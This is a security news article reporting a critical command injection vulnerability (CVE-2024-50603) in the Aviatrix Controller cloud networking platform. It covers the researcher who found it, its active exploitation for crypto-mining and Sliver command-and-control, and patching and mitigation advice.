Overview of the Issue

A major security flaw has been discovered in the Aviatrix Controller, a popular cloud networking platform, leaving it open to attacks. This vulnerability, tracked as CVE-2024-50603 with a critical CVSS score of 10.0, enables attackers to remotely execute malicious code without any authentication.

You might be interested: 7 Malware Threats Canadian Businesses Should Watch Out for in 2025

The root of the problem lies in certain API endpoints that fail to properly validate user inputs, allowing attackers to inject harmful commands into the operating system. Fortunately, updates addressing this issue are available in versions 7.1.4191 and 7.2.4996 of the platform. All users are strongly urged to apply these patches immediately.

Discovery and Public PoC Release

The vulnerability was uncovered by Jakub Korepta, a researcher from the Polish cybersecurity company Securing, who also reported it to the platform developers. Since the discovery, a proof-of-concept (PoC) exploit has been released publicly, increasing the urgency for users to act quickly to secure their systems.

Scope of the Risk

The Aviatrix Controller is used in approximately 3% of enterprise cloud environments, according to a report by cloud security company Wiz. Alarmingly, 65% of these setups provide attackers with pathways to escalate privileges within the cloud control plane. Once attackers gain such access, they can exploit it further to compromise other parts of the system.

Wiz researchers noted that AWS cloud environments using Aviatrix Controllers are especially vulnerable because they enable privilege escalation by default. This makes the vulnerability particularly risky and impactful.

Real-World Exploitation and Threats

Cybercriminals are actively exploiting this flaw to achieve initial access to systems and carry out further malicious activities. Known threats include:

• Cryptocurrency Mining: Attackers are deploying XMRig to mine cryptocurrency, hijacking system resources.
• Command-and-Control (C2) Frameworks: The Sliver framework is being used to maintain persistent control and execute additional exploits.

While no direct evidence of attackers moving laterally within cloud environments has been found, Wiz researchers suspect they are using the flaw to identify cloud permissions and potentially steal sensitive data.

Recommendations for Immediate Action

Given the active exploitation of this vulnerability, all Aviatrix Controller users should:

1. Update to the latest version immediately: Install the patched versions (7.1.4191 or 7.2.4996) to close the security gap.
2. Restrict public access: Ensure the Aviatrix Controller is not exposed to the internet to reduce risk.
3. Monitor for unusual activity: Check for signs of cryptocurrency mining, unauthorized access, or unusual resource usage.

Conclusion

This vulnerability poses a significant threat to cloud environments and requires immediate attention. By applying updates and following security best practices, organizations can protect themselves from these ongoing attacks. Don’t delay—secure your systems now to prevent potential breaches.